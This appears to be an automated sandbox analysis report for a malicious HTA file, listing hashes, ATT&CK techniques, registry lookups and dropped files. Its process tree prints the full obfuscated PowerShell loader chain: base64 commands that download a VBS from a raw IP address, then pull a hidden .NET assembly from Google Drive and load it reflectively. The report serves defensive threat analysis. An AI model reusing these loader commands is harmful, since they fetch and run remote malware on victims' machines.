5775dd79d6529e77182ceccb5f0a1d9d22d4884017df41dade409caf6471e48f

Analysis

max time kernel
135s
max time network
142s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
01-11-2024 03:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5775dd79d6529e77182ceccb5f0a1d9d22d4884017df41dade409caf6471e48f.hta
Size

205KB
MD5

0b94188f0fe1baed9f97e0a69806b6e9
SHA1

65a871c11c36799a747b8b40154130415f6e6f84
SHA256

5775dd79d6529e77182ceccb5f0a1d9d22d4884017df41dade409caf6471e48f
SHA512

ad87371d82d5887377cc5882111f26849c6783427bf15c2fe235ca7570898d8937032e445e377acfe6d495ba01a0cad558fd0a3ecb23152b177ef5708639b75a
SSDEEP

96:43F975adf4WbLdfSWbmx0JnfXdfmdfvUWbEdfAQ:43F15Of4GRfSGmx0J1fqfvUGAfAQ

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
21	2324	pOwErshEll.ExE
26	1608	powershell.exe
30	1608	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3636	powershell.exe
1608	powershell.exe

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
2324	pOwErshEll.ExE
720	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	WScript.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
26	drive.google.com
25	drive.google.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pOwErshEll.ExE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings	pOwErshEll.ExE

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
2324	pOwErshEll.ExE
2324	pOwErshEll.ExE
720	powershell.exe
720	powershell.exe
3636	powershell.exe
3636	powershell.exe
1608	powershell.exe
1608	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2324	pOwErshEll.ExE
Token: SeDebugPrivilege	720	powershell.exe
Token: SeDebugPrivilege	3636	powershell.exe
Token: SeDebugPrivilege	1608	powershell.exe

Suspicious use of WriteProcessMemory 21 IoCs

description	pid	Process	procid_target
PID 3512 wrote to memory of 2324	3512	mshta.exe	85
PID 3512 wrote to memory of 2324	3512	mshta.exe	85
PID 3512 wrote to memory of 2324	3512	mshta.exe	85
PID 2324 wrote to memory of 720	2324	pOwErshEll.ExE	89
PID 2324 wrote to memory of 720	2324	pOwErshEll.ExE	89
PID 2324 wrote to memory of 720	2324	pOwErshEll.ExE	89
PID 2324 wrote to memory of 3596	2324	pOwErshEll.ExE	92
PID 2324 wrote to memory of 3596	2324	pOwErshEll.ExE	92
PID 2324 wrote to memory of 3596	2324	pOwErshEll.ExE	92
PID 3596 wrote to memory of 3420	3596	csc.exe	93
PID 3596 wrote to memory of 3420	3596	csc.exe	93
PID 3596 wrote to memory of 3420	3596	csc.exe	93
PID 2324 wrote to memory of 2112	2324	pOwErshEll.ExE	99
PID 2324 wrote to memory of 2112	2324	pOwErshEll.ExE	99
PID 2324 wrote to memory of 2112	2324	pOwErshEll.ExE	99
PID 2112 wrote to memory of 3636	2112	WScript.exe	100
PID 2112 wrote to memory of 3636	2112	WScript.exe	100
PID 2112 wrote to memory of 3636	2112	WScript.exe	100
PID 3636 wrote to memory of 1608	3636	powershell.exe	102
PID 3636 wrote to memory of 1608	3636	powershell.exe	102
PID 3636 wrote to memory of 1608	3636	powershell.exe	102

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\5775dd79d6529e77182ceccb5f0a1d9d22d4884017df41dade409caf6471e48f.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3512
- C:\Windows\SysWOW64\WINdoWsPOweRSHeLl\V1.0\pOwErshEll.ExE
  "C:\Windows\sYsteM32\WINdoWsPOweRSHeLl\V1.0\pOwErshEll.ExE" "pOweRshell -Ex bYPAss -noP -w 1 -c deVICEcREdEnTiaLDEPlOYmENt.eXe ; IeX($(iEX('[sYsTem.teXt.ENcoding]'+[ChAR]0X3A+[ChAR]0X3A+'utF8.geTstRInG([sYsTeM.CoNVeRt]'+[CHaR]0X3A+[char]0x3a+'fRoMBase64sTrinG('+[ChAR]0X22+'JEhReHJKU2ZXICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FbUJlUkRFRkluaXRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsTU9OLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHl2Q2FjT3NiUixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxVEN2dHJKVElJcyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRHdUc0dkTE0sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXdMKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAib1V1WXR5IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpRFFLc1Z2b0pUUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkSFF4ckpTZlc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjE1MS82NS9zZWV0aGViZXN0aHRpbmdzd2l0aG1ld2hpY2hnaXZlZ3JlYXRvdXRwdXRvZm1lZ29vZC50SUYiLCIkRW5WOkFQUERBVEFcc2VldGhlYmVzdGh0aW5nc3dpdGhtZXdoaWNoZ2l2ZWdyZWF0b3V0cHV0b2ZtLnZiUyIsMCwwKTtTdGFSdC1TbGVFcCgzKTtzdEFyVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcc2VldGhlYmVzdGh0aW5nc3dpdGhtZXdoaWNoZ2l2ZWdyZWF0b3V0cHV0b2ZtLnZiUyI='+[cHar]0X22+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2324
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAss -noP -w 1 -c deVICEcREdEnTiaLDEPlOYmENt.eXe
    3⤵
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:720
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\q50rqmxx\q50rqmxx.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3596
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9049.tmp" "c:\Users\Admin\AppData\Local\Temp\q50rqmxx\CSCAF90AD8B2116496D91BBD4E9A25EB334.TMP"
      4⤵
      System Location Discovery: System Language Discovery
      PID:3420
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebesthtingswithmewhichgivegreatoutputofm.vbS"
    3⤵
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2112
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRTaEVMTElkWzFdKyRzaGVsTElkWzEzXSsneCcpICgoJ1M3RmltYWdlJysnVXJsID0gYkJIaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgYkJIO1M3RndlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbicrJ3Q7UzdGaW1hZ2VCeXRlcyA9IFM3RndlYkNsaWVudC5Eb3dubG9hZERhJysndGEoUzdGaW1hJysnZ2VVcmwpO1M3RmltYWdlVGV4dCA9JysnIFtTeXN0ZW0uVGUnKyd4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nJysnKFM3RmltYWdlQnl0ZXMpO1M3RnN0YXJ0RmxhZyA9IGJCSDw8JysnQkFTRTY0XycrJ1NUQVJUPj5iQkg7UzdGZW5kRmxhZyA9IGInKydCSDw8QkFTRTY0X0VORD4+YkJIO1M3RnN0YXJ0SW5kZXggPSBTN0ZpbWFnZVRleHQuSW5kZXhPZihTN0ZzdGFydEZsYWcpO1M3RmVuZEluZGV4JysnID0gUzdGaW1hZ2VUZXh0LkluZGV4T2YoUzdGZW5kRmxhJysnZyk7UzdGc3RhcnRJbmRleCAtZ2UgJysnMCAtYW5kIFM3RmVuZEluZGV4IC1ndCBTN0ZzdCcrJ2FydEluZGV4O1M3RnN0YXJ0SW5kZXggKz0gUzdGJysnc3RhcnRGbGFnLkxlbmcnKyd0aDtTN0ZiYScrJ3NlNjRMZW5ndGggPSBTN0ZlbmRJbmRleCAtIFM3RnN0YXInKyd0SW5kZXg7UzdGYmFzZTY0Q29tbWFuZCA9IFM3RmltYWdlVGV4dC5TdWJzdHJpbmcoUzdGc3RhcnRJbmRleCwgUzdGYmFzZTY0TCcrJ2VuZ3RoKTsnKydTN0ZiYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luICcrJyhTN0ZiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgQkRGIEZvckVhY2gtT2JqZWN0IHsgUzdGXyB9KVsnKyctJysnMS4nKycuLShTN0ZiYXNlNjRDb21tYW5kLkxlbmd0aCldO1M3RmNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoUzdGYicrJ2FzZTY0UmV2ZXJzZWQpO1M3RmxvYWRlZEFzJysnc2VtJysnYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChTN0Zjb21tYScrJ25kJysnQnl0JysnZXMpO1M3RnZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXScrJy5HZXRNZXRob2QoYkJIVkFJJysnYkJIKTtTN0Z2YWlNZXRob2QuSW52b2tlKFM3Rm51JysnbGwsIEAoYkJIdHh0LktMTExQTVMvNTYvMTUxLjg3MS42NC44OTEvLzpwdHRoYkJILCBiQkhkZXNhdGl2YWRvYkJILCBiQkhkZXNhdGl2YWRvYkInKydILCBiQkhkZXNhdGl2YWRvYkJILCBiQkhhc3BuZXRfcmVnYnJvd3NlcnNiQkgsIGJCSGRlc2F0aXZhZG9iQkgsIGJCSGRlc2F0aXZhZG9iQkgsYkJIZGVzYXRpdmFkb2JCSCxiQkhkZXNhdGl2YWRvJysnYkJILGJCSGRlc2F0aXZhZG8nKydiQkgsYkJIZGUnKydzYXRpdmFkb2JCSCxiQkhkZXNhdGl2YWRvYkJILGJCSDFiQkgsYkJIZGVzYXRpdmFkb2JCSCkpOycpLlJlUGxhY0UoJ0JERicsJ3wnKS5SZVBsYWNFKCdiQkgnLFtzdFJpbmddW2NoYXJdMzkpLlJlUGxhY0UoJ1M3RicsJyQnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3636
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ShELLId[1]+$shelLId[13]+'x') (('S7Fimage'+'Url = bBHhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur bBH;S7FwebClient = New-Object System.Net.WebClien'+'t;S7FimageBytes = S7FwebClient.DownloadDa'+'ta(S7Fima'+'geUrl);S7FimageText ='+' [System.Te'+'xt.Encoding]::UTF8.GetString'+'(S7FimageBytes);S7FstartFlag = bBH<<'+'BASE64_'+'START>>bBH;S7FendFlag = b'+'BH<<BASE64_END>>bBH;S7FstartIndex = S7FimageText.IndexOf(S7FstartFlag);S7FendIndex'+' = S7FimageText.IndexOf(S7FendFla'+'g);S7FstartIndex -ge '+'0 -and S7FendIndex -gt S7Fst'+'artIndex;S7FstartIndex += S7F'+'startFlag.Leng'+'th;S7Fba'+'se64Length = S7FendIndex - S7Fstar'+'tIndex;S7Fbase64Command = S7FimageText.Substring(S7FstartIndex, S7Fbase64L'+'ength);'+'S7Fbase64Reversed = -jo'+'in '+'(S7Fbase64Command.ToCharArray() BDF ForEach-Object { S7F_ })['+'-'+'1.'+'.-(S7Fbase64Command.Length)];S7FcommandBytes = [System.Convert]::FromBase64String(S7Fb'+'ase64Reversed);S7FloadedAs'+'sem'+'bly = [System.Reflection.Assembly]::Load(S7Fcomma'+'nd'+'Byt'+'es);S7FvaiMethod = [dnlib.IO.Home]'+'.GetMethod(bBHVAI'+'bBH);S7FvaiMethod.Invoke(S7Fnu'+'ll, @(bBHtxt.KLLLPMS/56/151.871.64.891//:ptthbBH, bBHdesativadobBH, bBHdesativadobB'+'H, bBHdesativadobBH, bBHaspnet_regbrowsersbBH, bBHdesativadobBH, bBHdesativadobBH,bBHdesativadobBH,bBHdesativado'+'bBH,bBHdesativado'+'bBH,bBHde'+'sativadobBH,bBHdesativadobBH,bBH1bBH,bBHdesativadobBH));').RePlacE('BDF','|').RePlacE('bBH',[stRing][char]39).RePlacE('S7F','$'))"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1608

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\pOwErshEll.ExE.log

Filesize
2KB

MD5
3d086a433708053f9bf9523e1d87a4e8

SHA1
b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28

SHA256
6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69

SHA512
931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
12KB

MD5
3a6ad130d87f3306a3b67ee57923d777

SHA1
ee2d0a9ab3297ad18fe14efbd0e690f8e58877fc

SHA256
3ef6cdef64f93ff21dda8ba6b8aeb3a8c66fc298f0e8d9c7560f845f6ea0de60

SHA512
1db4b0747d160d1336099107104f7a8aa59d16ddc201a7a4557c77f0ba2a193e38457224ccffeecb24564accf93b5fafc944c38570f96fd21f02efbe019c08fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
f80ce0819dd9a92bfbc1d085058a88cb

SHA1
a379e6c81f6bc688111dce3e4361907c9eaf9052

SHA256
c8afe8c943813288d21e95ba6497eac8e7bc9a2c223074df1254c131bd5cd20f

SHA512
bc011bfb4fcf33ac7936d61e9a04edc233ff52216298fc352150112927a699bc5420d97717d96fe4128bdda62047f265181f7c948f151401a6ef7ab6f0268bbb

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES9049.tmp

Filesize
1KB

MD5
ac9a91679730928802300a50aefcbae5

SHA1
4e87c50ab84372c9b4be18231cd5a2b55ea69a84

SHA256
71270360a8dd63a6298cd360f5eb57d28a7b857100a35e436b3489256529fc38

SHA512
2861e765cb5240547ed11d54387307994729ae3231ec536ec5aa050e6e9d7b060aeac76487222ab2318b0435b18934d27db863685818d43d1735c80abf028808

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s4w2flyy.3nv.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\q50rqmxx\q50rqmxx.dll

Filesize
3KB

MD5
86b9b05211a5b01c61f695b97abbdbfb

SHA1
7f689bfbc18491b7ba337586b0bedf0cfe3dfd32

SHA256
311c84f75e3483b722b8e6d64c8a0eb5fe690d4041ab04caf0df10563c12c2e5

SHA512
22d246e05383befd95e759b06302f239429684560e16bb5a3e29274fd348015869566ca5240fa7d0dbe77c7b57a98d87d5003d9493df6ef906a8ef6ff4f188b5

Download Submit
C:\Users\Admin\AppData\Roaming\seethebesthtingswithmewhichgivegreatoutputofm.vbS

Filesize
137KB

MD5
4dd3d6eed0e1ade77fde299848078ef8

SHA1
75855bee75c0c52d00cad1897c381ffc6c706200

SHA256
9bff58b3dfe1955e923ed90e899ac419667de9e6c842753d68614fbf8f612305

SHA512
3c7907b390cedb7f619f1cb9d3aaa24c623a6083995be4a45690e5fd05982df6054e33d1d434cbcb725ad27003529112abb52138d4f5125bfc8680a786701e5d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\q50rqmxx\CSCAF90AD8B2116496D91BBD4E9A25EB334.TMP

Filesize
652B

MD5
beb0d381749d3648ea1be63380e69a8c

SHA1
e136a86aec8d9b75734f5a1782d70199b4c1cd47

SHA256
c043df8d29c6eebae859dc24928ddda2d357cf69bf01687ff0c3df8de525b9eb

SHA512
2073608f7cc2af552bfe5b77af40c5583ea8fd3ca2a4afab4cf5d9ac6528ae26339eca858bdd10c4af2e8422f4759fe901a9a9209adc302112532dc44edd96c4

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\q50rqmxx\q50rqmxx.0.cs

Filesize
487B

MD5
9b8f2dee116254910197a8801c205862

SHA1
c4fddb1f937921b75c5c988cdb3f459faa446d52

SHA256
5dc90823fdcadfdd6112440b46638cf1ab71285482a67d35e2bf187f68d39ee3

SHA512
00e292822b1e9e94fdf9d91a3edd5cc30f09b02bc6413dde3bb8d1941534637cb0832544f984ed65944e30e473a6820e6816841261efef0f519dab6a14ebf218

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\q50rqmxx\q50rqmxx.cmdline

Filesize
369B

MD5
a7bee30b3b920f39263d6439283a5aab

SHA1
4db14d11414c194ca20818e41261a45e1cf8e797

SHA256
d49e440447e4a0a77099c9758e41db55c382eae1d87e51a0bed8f993c68918a7

SHA512
67284b0016ace915406621b298dd1e8b1d6c9653c7391ee86d752255a5b30c151e2957acf27594048ab9d97fb6069fabec83acccd929bc963fae2ee5a4f6deb1

Download Submit
memory/720-46-0x00000000077F0000-0x0000000007801000-memory.dmp

Filesize
68KB

Download
memory/720-49-0x0000000007940000-0x000000000795A000-memory.dmp

Filesize
104KB

Download
memory/720-30-0x000000006DD40000-0x000000006DD8C000-memory.dmp

Filesize
304KB

Download
memory/720-29-0x0000000007440000-0x0000000007472000-memory.dmp

Filesize
200KB

Download
memory/720-41-0x00000000074B0000-0x0000000007553000-memory.dmp

Filesize
652KB

Download
memory/720-40-0x0000000007480000-0x000000000749E000-memory.dmp

Filesize
120KB

Download
memory/720-43-0x00000000075F0000-0x000000000760A000-memory.dmp

Filesize
104KB

Download
memory/720-42-0x0000000007C30000-0x00000000082AA000-memory.dmp

Filesize
6.5MB

Download
memory/720-44-0x0000000007650000-0x000000000765A000-memory.dmp

Filesize
40KB

Download
memory/720-45-0x0000000007880000-0x0000000007916000-memory.dmp

Filesize
600KB

Download
memory/720-50-0x0000000007870000-0x0000000007878000-memory.dmp

Filesize
32KB

Download
memory/720-48-0x0000000007830000-0x0000000007844000-memory.dmp

Filesize
80KB

Download
memory/720-47-0x0000000007820000-0x000000000782E000-memory.dmp

Filesize
56KB

Download
memory/2324-18-0x0000000006290000-0x00000000062AE000-memory.dmp

Filesize
120KB

Download
memory/2324-72-0x0000000071480000-0x0000000071C30000-memory.dmp

Filesize
7.7MB

Download
memory/2324-19-0x00000000062D0000-0x000000000631C000-memory.dmp

Filesize
304KB

Download
memory/2324-17-0x0000000005E60000-0x00000000061B4000-memory.dmp

Filesize
3.3MB

Download
memory/2324-7-0x0000000005C60000-0x0000000005CC6000-memory.dmp

Filesize
408KB

Download
memory/2324-6-0x0000000005BF0000-0x0000000005C56000-memory.dmp

Filesize
408KB

Download
memory/2324-65-0x0000000006850000-0x0000000006858000-memory.dmp

Filesize
32KB

Download
memory/2324-5-0x00000000052F0000-0x0000000005312000-memory.dmp

Filesize
136KB

Download
memory/2324-71-0x000000007148E000-0x000000007148F000-memory.dmp

Filesize
4KB

Download
memory/2324-0-0x000000007148E000-0x000000007148F000-memory.dmp

Filesize
4KB

Download
memory/2324-73-0x0000000007670000-0x0000000007692000-memory.dmp

Filesize
136KB

Download
memory/2324-74-0x0000000008520000-0x0000000008AC4000-memory.dmp

Filesize
5.6MB

Download
memory/2324-4-0x0000000071480000-0x0000000071C30000-memory.dmp

Filesize
7.7MB

Download
memory/2324-2-0x0000000071480000-0x0000000071C30000-memory.dmp

Filesize
7.7MB

Download
memory/2324-3-0x0000000005450000-0x0000000005A78000-memory.dmp

Filesize
6.2MB

Download
memory/2324-81-0x0000000071480000-0x0000000071C30000-memory.dmp

Filesize
7.7MB

Download
memory/2324-1-0x0000000002970000-0x00000000029A6000-memory.dmp

Filesize
216KB

Download
memory/3636-91-0x0000000005B20000-0x0000000005E74000-memory.dmp

Filesize
3.3MB

Download